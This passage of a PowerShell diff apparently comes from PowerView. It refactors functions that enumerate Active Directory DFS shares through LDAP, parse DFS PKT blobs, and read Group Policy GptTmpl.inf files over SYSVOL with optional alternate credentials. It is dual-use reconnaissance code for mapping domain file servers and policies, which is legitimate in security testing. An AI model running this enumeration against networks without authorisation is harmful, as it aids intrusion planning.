-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DFSshare -Domain test
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainDFSShare -Credential $Cred
 
-        Returns all distributed file system shares for the 'test' domain.
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+A custom PSObject describing the distributed file systems.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+    [OutputType('System.Management.Automation.PSCustomObject')]
     [CmdletBinding()]
-    param(
-        [String]
-        [ValidateSet("All","V1","1","V2","2")]
-        $Version = "All",
+    Param(
+        [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainName', 'Name')]
+        [String[]]
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $Domain,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $DomainController,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $ADSpath,
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [ValidateSet('All', 'V1', '1', 'V2', '2')]
+        [String]
+        $Version = 'All'
     )
 
-    function Parse-Pkt {
-        [CmdletBinding()]
-        param(
-            [byte[]]
-            $Pkt
-        )
-
-        $bin = $Pkt
-        $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)
-        $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)
-        $offset = 8
-        #https://msdn.microsoft.com/en-us/library/cc227147.aspx
-        $object_list = @()
-        for($i=1; $i -le $blob_element_count; $i++){
-               $blob_name_size_start = $offset
-               $blob_name_size_end = $offset + 1
-               $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)
-
-               $blob_name_start = $blob_name_size_end + 1
-               $blob_name_end = $blob_name_start + $blob_name_size - 1
-               $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])
-
-               $blob_data_size_start = $blob_name_end + 1
-               $blob_data_size_end = $blob_data_size_start + 3
-               $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)
-
-               $blob_data_start = $blob_data_size_end + 1
-               $blob_data_end = $blob_data_start + $blob_data_size - 1
-               $blob_data = $bin[$blob_data_start..$blob_data_end]
-               switch -wildcard ($blob_name) {
-                "\siteroot" {  }
-                "\domainroot*" {
-                    # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...
-                    # DFSRootOrLinkIDBlob
-                    $root_or_link_guid_start = 0
-                    $root_or_link_guid_end = 15
-                    $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]
-                    $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str
-                    $prefix_size_start = $root_or_link_guid_end + 1
-                    $prefix_size_end = $prefix_size_start + 1
-                    $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)
-                    $prefix_start = $prefix_size_end + 1
-                    $prefix_end = $prefix_start + $prefix_size - 1
-                    $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])
-
-                    $short_prefix_size_start = $prefix_end + 1
-                    $short_prefix_size_end = $short_prefix_size_start + 1
-                    $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)
-                    $short_prefix_start = $short_prefix_size_end + 1
-                    $short_prefix_end = $short_prefix_start + $short_prefix_size - 1
-                    $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])
-
-                    $type_start = $short_prefix_end + 1
-                    $type_end = $type_start + 3
-                    $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)
-
-                    $state_start = $type_end + 1
-                    $state_end = $state_start + 3
-                    $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)
-
-                    $comment_size_start = $state_end + 1
-                    $comment_size_end = $comment_size_start + 1
-                    $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)
-                    $comment_start = $comment_size_end + 1
-                    $comment_end = $comment_start + $comment_size - 1
-                    if ($comment_size -gt 0)  {
-                        $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])
-                    }
-                    $prefix_timestamp_start = $comment_end + 1
-                    $prefix_timestamp_end = $prefix_timestamp_start + 7
-                    # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME
-                    $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime
-                    $state_timestamp_start = $prefix_timestamp_end + 1
-                    $state_timestamp_end = $state_timestamp_start + 7
-                    $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]
-                    $comment_timestamp_start = $state_timestamp_end + 1
-                    $comment_timestamp_end = $comment_timestamp_start + 7
-                    $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]
-                    $version_start = $comment_timestamp_end  + 1
-                    $version_end = $version_start + 3
-                    $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)
-
-                    # Parse rest of DFSNamespaceRootOrLinkBlob here
-                    $dfs_targetlist_blob_size_start = $version_end + 1
-                    $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3
-                    $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)
-
-                    $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1
-                    $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1
-                    $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]
-                    $reserved_blob_size_start = $dfs_targetlist_blob_end + 1
-                    $reserved_blob_size_end = $reserved_blob_size_start + 3
-                    $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)
-
-                    $reserved_blob_start = $reserved_blob_size_end + 1
-                    $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1
-                    $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]
-                    $referral_ttl_start = $reserved_blob_end + 1
-                    $referral_ttl_end = $referral_ttl_start + 3
-                    $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)
-
-                    #Parse DFSTargetListBlob
-                    $target_count_start = 0
-                    $target_count_end = $target_count_start + 3
-                    $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)
-                    $t_offset = $target_count_end + 1
-
-                    for($j=1; $j -le $target_count; $j++){
-                        $target_entry_size_start = $t_offset
-                        $target_entry_size_end = $target_entry_size_start + 3
-                        $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)
-                        $target_time_stamp_start = $target_entry_size_end + 1
-                        $target_time_stamp_end = $target_time_stamp_start + 7
-                        # FILETIME again or special if priority rank and priority class 0
-                        $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]
-                        $target_state_start = $target_time_stamp_end + 1
-                        $target_state_end = $target_state_start + 3
-                        $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)
-
-                        $target_type_start = $target_state_end + 1
-                        $target_type_end = $target_type_start + 3
-                        $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)
-
-                        $server_name_size_start = $target_type_end + 1
-                        $server_name_size_end = $server_name_size_start + 1
-                        $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)
-
-                        $server_name_start = $server_name_size_end + 1
-                        $server_name_end = $server_name_start + $server_name_size - 1
-                        $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])
-
-                        $share_name_size_start = $server_name_end + 1
-                        $share_name_size_end = $share_name_size_start + 1
-                        $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)
-                        $share_name_start = $share_name_size_end + 1
-                        $share_name_end = $share_name_start + $share_name_size - 1
-                        $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])
-
-                        $target_list += "\\$server_name\$share_name"
-                        $t_offset = $share_name_end + 1
-                    }
-                }
-            }
-            $offset = $blob_data_end + 1
-            $dfs_pkt_properties = @{
-                'Name' = $blob_name
-                'Prefix' = $prefix
-                'TargetList' = $target_list
-            }
-            $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties
-            $prefix = $null
-            $blob_name = $null
-            $target_list = $null
-        }
-
-        $servers = @()
-        $object_list | ForEach-Object {
-            if ($_.TargetList) {
-                $_.TargetList | ForEach-Object {
-                    $servers += $_.split("\")[2]
-                }
-            }
-        }
-
-        $servers
-    }
-
-    function Get-DFSshareV1 {
-        [CmdletBinding()]
-        param(
-            [String]
-            $Domain,
-
-            [String]
-            $DomainController,
+    BEGIN {
+        $SearcherArguments = @{}
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+        function Parse-Pkt {
+            [CmdletBinding()]
+            Param(
+                [Byte[]]
+                $Pkt
+            )
 
-            [String]
-            $ADSpath,
+            $bin = $Pkt
+            $blob_version = [bitconverter]::ToUInt32($bin[0..3],0)
+            $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)
+            $offset = 8
+            #https://msdn.microsoft.com/en-us/library/cc227147.aspx
+            $object_list = @()
+            for($i=1; $i -le $blob_element_count; $i++){
+                $blob_name_size_start = $offset
+                $blob_name_size_end = $offset + 1
+                $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)
+
+                $blob_name_start = $blob_name_size_end + 1
+                $blob_name_end = $blob_name_start + $blob_name_size - 1
+                $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])
+
+                $blob_data_size_start = $blob_name_end + 1
+                $blob_data_size_end = $blob_data_size_start + 3
+                $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)
+
+                $blob_data_start = $blob_data_size_end + 1
+                $blob_data_end = $blob_data_start + $blob_data_size - 1
+                $blob_data = $bin[$blob_data_start..$blob_data_end]
+                switch -wildcard ($blob_name) {
+                    "\siteroot" {  }
+                    "\domainroot*" {
+                        # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...
+                        # DFSRootOrLinkIDBlob
+                        $root_or_link_guid_start = 0
+                        $root_or_link_guid_end = 15
+                        $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]
+                        $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str
+                        $prefix_size_start = $root_or_link_guid_end + 1
+                        $prefix_size_end = $prefix_size_start + 1
+                        $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)
+                        $prefix_start = $prefix_size_end + 1
+                        $prefix_end = $prefix_start + $prefix_size - 1
+                        $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])
+
+                        $short_prefix_size_start = $prefix_end + 1
+                        $short_prefix_size_end = $short_prefix_size_start + 1
+                        $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)
+                        $short_prefix_start = $short_prefix_size_end + 1
+                        $short_prefix_end = $short_prefix_start + $short_prefix_size - 1
+                        $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])
+
+                        $type_start = $short_prefix_end + 1
+                        $type_end = $type_start + 3
+                        $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)
+
+                        $state_start = $type_end + 1
+                        $state_end = $state_start + 3
+                        $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)
+
+                        $comment_size_start = $state_end + 1
+                        $comment_size_end = $comment_size_start + 1
+                        $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)
+                        $comment_start = $comment_size_end + 1
+                        $comment_end = $comment_start + $comment_size - 1
+                        if ($comment_size -gt 0)  {
+                            $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])
+                        }
+                        $prefix_timestamp_start = $comment_end + 1
+                        $prefix_timestamp_end = $prefix_timestamp_start + 7
+                        # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME
+                        $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime
+                        $state_timestamp_start = $prefix_timestamp_end + 1
+                        $state_timestamp_end = $state_timestamp_start + 7
+                        $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]
+                        $comment_timestamp_start = $state_timestamp_end + 1
+                        $comment_timestamp_end = $comment_timestamp_start + 7
+                        $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]
+                        $version_start = $comment_timestamp_end  + 1
+                        $version_end = $version_start + 3
+                        $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)
+
+                        # Parse rest of DFSNamespaceRootOrLinkBlob here
+                        $dfs_targetlist_blob_size_start = $version_end + 1
+                        $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3
+                        $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)
+
+                        $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1
+                        $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1
+                        $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]
+                        $reserved_blob_size_start = $dfs_targetlist_blob_end + 1
+                        $reserved_blob_size_end = $reserved_blob_size_start + 3
+                        $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)
+
+                        $reserved_blob_start = $reserved_blob_size_end + 1
+                        $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1
+                        $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]
+                        $referral_ttl_start = $reserved_blob_end + 1
+                        $referral_ttl_end = $referral_ttl_start + 3
+                        $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)
+
+                        #Parse DFSTargetListBlob
+                        $target_count_start = 0
+                        $target_count_end = $target_count_start + 3
+                        $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)
+                        $t_offset = $target_count_end + 1
+
+                        for($j=1; $j -le $target_count; $j++){
+                            $target_entry_size_start = $t_offset
+                            $target_entry_size_end = $target_entry_size_start + 3
+                            $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)
+                            $target_time_stamp_start = $target_entry_size_end + 1
+                            $target_time_stamp_end = $target_time_stamp_start + 7
+                            # FILETIME again or special if priority rank and priority class 0
+                            $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]
+                            $target_state_start = $target_time_stamp_end + 1
+                            $target_state_end = $target_state_start + 3
+                            $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)
+
+                            $target_type_start = $target_state_end + 1
+                            $target_type_end = $target_type_start + 3
+                            $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)
+
+                            $server_name_size_start = $target_type_end + 1
+                            $server_name_size_end = $server_name_size_start + 1
+                            $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)
+
+                            $server_name_start = $server_name_size_end + 1
+                            $server_name_end = $server_name_start + $server_name_size - 1
+                            $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])
+
+                            $share_name_size_start = $server_name_end + 1
+                            $share_name_size_end = $share_name_size_start + 1
+                            $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)
+                            $share_name_start = $share_name_size_end + 1
+                            $share_name_end = $share_name_start + $share_name_size - 1
+                            $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])
+
+                            $target_list += "\\$server_name\$share_name"
+                            $t_offset = $share_name_end + 1
+                        }
+                    }
+                }
+                $offset = $blob_data_end + 1
+                $dfs_pkt_properties = @{
+                    'Name' = $blob_name
+                    'Prefix' = $prefix
+                    'TargetList' = $target_list
+                }
+                $object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties
+                $prefix = $Null
+                $blob_name = $Null
+                $target_list = $Null
+            }
 
-            [ValidateRange(1,10000)]
-            [Int]
-            $PageSize = 200,
+            $servers = @()
+            $object_list | ForEach-Object {
+                if ($_.TargetList) {
+                    $_.TargetList | ForEach-Object {
+                        $servers += $_.split('\')[2]
+                    }
+                }
+            }
 
-            [Management.Automation.PSCredential]
-            $Credential
-        )
+            $servers
+        }
 
-        $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+        function Get-DomainDFSShareV1 {
+            [CmdletBinding()]
+            Param(
+                [String]
+                $Domain,
 
-        if($DFSsearcher) {
-            $DFSshares = @()
-            $DFSsearcher.filter = "(&(objectClass=fTDfs))"
+                [String]
+                $SearchBase,
 
-            try {
-                $Results = $DFSSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    $Properties = $_.Properties
-                    $RemoteNames = $Properties.remoteservername
-                    $Pkt = $Properties.pkt
+                [String]
+                $Server,
 
-                    $DFSshares += $RemoteNames | ForEach-Object {
-                        try {
-                            if ( $_.Contains('\') ) {
-                                New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split("\")[2]}
+                [String]
+                $SearchScope = 'Subtree',
+
+                [Int]
+                $ResultPageSize = 200,
+
+                [Int]
+                $ServerTimeLimit,
+
+                [Switch]
+                $Tombstone,
+
+                [Management.Automation.PSCredential]
+                [Management.Automation.CredentialAttribute()]
+                $Credential = [Management.Automation.PSCredential]::Empty
+            )
+
+            $DFSsearcher = Get-DomainSearcher @PSBoundParameters
+
+            if ($DFSsearcher) {
+                $DFSshares = @()
+                $DFSsearcher.filter = '(&(objectClass=fTDfs))'
+
+                try {
+                    $Results = $DFSSearcher.FindAll()
+                    $Results | Where-Object {$_} | ForEach-Object {
+                        $Properties = $_.Properties
+                        $RemoteNames = $Properties.remoteservername
+                        $Pkt = $Properties.pkt
+
+                        $DFSshares += $RemoteNames | ForEach-Object {
+                            try {
+                                if ( $_.Contains('\') ) {
+                                    New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]}
+                                }
+                            }
+                            catch {
+                                Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_"
                             }
                         }
+                    }
+                    if ($Results) {
+                        try { $Results.dispose() }
                         catch {
-                            Write-Verbose "Error in parsing DFS share : $_"
+                            Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_"
                         }
                     }
-                }
-                $Results.dispose()
-                $DFSSearcher.dispose()
-
-                if($pkt -and $pkt[0]) {
-                    Parse-Pkt $pkt[0] | ForEach-Object {
-                        # If a folder doesn't have a redirection it will
-                        # have a target like
-                        # \\null\TestNameSpace\folder\.DFSFolderLink so we
-                        # do actually want to match on "null" rather than
-                        # $null
-                        if ($_ -ne "null") {
-                            New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}
+                    $DFSSearcher.dispose()
+
+                    if ($pkt -and $pkt[0]) {
+                        Parse-Pkt $pkt[0] | ForEach-Object {
+                            # If a folder doesn't have a redirection it will have a target like
+                            # \\null\TestNameSpace\folder\.DFSFolderLink so we do actually want to match
+                            # on 'null' rather than $Null
+                            if ($_ -ne 'null') {
+                                New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}
+                            }
                         }
                     }
                 }
+                catch {
+                    Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_"
+                }
+                $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
             }
-            catch {
-                Write-Warning "Get-DFSshareV1 error : $_"
-            }
-            $DFSshares | Sort-Object -Property "RemoteServerName"
         }
-    }
 
-    function Get-DFSshareV2 {
-        [CmdletBinding()]
-        param(
-            [String]
-            $Domain,
+        function Get-DomainDFSShareV2 {
+            [CmdletBinding()]
+            Param(
+                [String]
+                $Domain,
 
-            [String]
-            $DomainController,
+                [String]
+                $SearchBase,
 
-            [String]
-            $ADSpath,
+                [String]
+                $Server,
 
-            [ValidateRange(1,10000)] 
-            [Int]
-            $PageSize = 200,
+                [String]
+                $SearchScope = 'Subtree',
 
-            [Management.Automation.PSCredential]
-            $Credential
-        )
+                [Int]
+                $ResultPageSize = 200,
 
-        $DFSsearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+                [Int]
+                $ServerTimeLimit,
 
-        if($DFSsearcher) {
-            $DFSshares = @()
-            $DFSsearcher.filter = "(&(objectClass=msDFS-Linkv2))"
-            $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))
+                [Switch]
+                $Tombstone,
 
-            try {
-                $Results = $DFSSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    $Properties = $_.Properties
-                    $target_list = $Properties.'msdfs-targetlistv2'[0]
-                    $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])
-                    $DFSshares += $xml.targets.ChildNodes | ForEach-Object {
-                        try {
-                            $Target = $_.InnerText
-                            if ( $Target.Contains('\') ) {
-                                $DFSroot = $Target.split("\")[3]
-                                $ShareName = $Properties.'msdfs-linkpathv2'[0]
-                                New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split("\")[2]}
+                [Management.Automation.PSCredential]
+                [Management.Automation.CredentialAttribute()]
+                $Credential = [Management.Automation.PSCredential]::Empty
+            )
+
+            $DFSsearcher = Get-DomainSearcher @PSBoundParameters
+
+            if ($DFSsearcher) {
+                $DFSshares = @()
+                $DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))'
+                $Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))
+
+                try {
+                    $Results = $DFSSearcher.FindAll()
+                    $Results | Where-Object {$_} | ForEach-Object {
+                        $Properties = $_.Properties
+                        $target_list = $Properties.'msdfs-targetlistv2'[0]
+                        $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])
+                        $DFSshares += $xml.targets.ChildNodes | ForEach-Object {
+                            try {
+                                $Target = $_.InnerText
+                                if ( $Target.Contains('\') ) {
+                                    $DFSroot = $Target.split('\')[3]
+                                    $ShareName = $Properties.'msdfs-linkpathv2'[0]
+                                    New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]}
+                                }
+                            }
+                            catch {
+                                Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_"
                             }
                         }
+                    }
+                    if ($Results) {
+                        try { $Results.dispose() }
                         catch {
-                            Write-Verbose "Error in parsing target : $_"
+                            Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
                         }
                     }
+                    $DFSSearcher.dispose()
                 }
-                $Results.dispose()
-                $DFSSearcher.dispose()
-            }
-            catch {
-                Write-Warning "Get-DFSshareV2 error : $_"
+                catch {
+                    Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_"
+                }
+                $DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
             }
-            $DFSshares | Sort-Object -Unique -Property "RemoteServerName"
         }
     }
 
-    $DFSshares = @()
+    PROCESS {
+        $DFSshares = @()
 
-    if ( ($Version -eq "all") -or ($Version.endsWith("1")) ) {
-        $DFSshares += Get-DFSshareV1 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
-    }
-    if ( ($Version -eq "all") -or ($Version.endsWith("2")) ) {
-        $DFSshares += Get-DFSshareV2 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
-    }
+        if ($PSBoundParameters['Domain']) {
+            ForEach ($TargetDomain in $Domain) {
+                $SearcherArguments['Domain'] = $TargetDomain
+                if ($Version -match 'all|1') {
+                    $DFSshares += Get-DomainDFSShareV1 @SearcherArguments
+                }
+                if ($Version -match 'all|2') {
+                    $DFSshares += Get-DomainDFSShareV2 @SearcherArguments
+                }
+            }
+        }
+        else {
+            if ($Version -match 'all|1') {
+                $DFSshares += Get-DomainDFSShareV1 @SearcherArguments
+            }
+            if ($Version -match 'all|2') {
+                $DFSshares += Get-DomainDFSShareV2 @SearcherArguments
+            }
+        }
 
-    $DFSshares | Sort-Object -Property ("RemoteServerName","Name") -Unique
+        $DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique
+    }
 }
 
 
@@ -6056,1690 +10362,2008 @@ function Get-DFSshare {
 #
 ########################################################
 
-
-filter Get-GptTmpl {
+function Get-GptTmpl {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Helper to parse a GptTmpl.inf policy file path into a custom object.
+Helper to parse a GptTmpl.inf policy file path into a hashtable.
 
-    .PARAMETER GptTmplPath
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent  
 
-        The GptTmpl.inf file path name to parse. 
+.DESCRIPTION
 
-    .PARAMETER UsePSDrive
+Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a
+GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
+is constructed and assumed to be the parse target. If -Credential is passed,
+Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
+the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
 
-        Switch. Mount the target GptTmpl folder path as a temporary PSDrive.
+.PARAMETER GptTmplPath
 
-    .EXAMPLE
+Specifies the GptTmpl.inf file path name to parse.
 
-        PS C:\> Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+.PARAMETER Credential
 
-        Parse the default domain policy .inf for dev.testlab.local
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+
+Parse the default domain policy .inf for dev.testlab.local
+
+.EXAMPLE
+
+Get-DomainGPO testing | Get-GptTmpl
+
+Parse the GptTmpl.inf policy for the GPO with display name of 'testing'.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
+
+Parse the default domain policy .inf for dev.testlab.local using alternate credentials.
+
+.OUTPUTS
+
+Hashtable
+
+Ouputs a hashtable representing the parsed GptTmpl.inf file.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType([Hashtable])]
     [CmdletBinding()]
     Param (
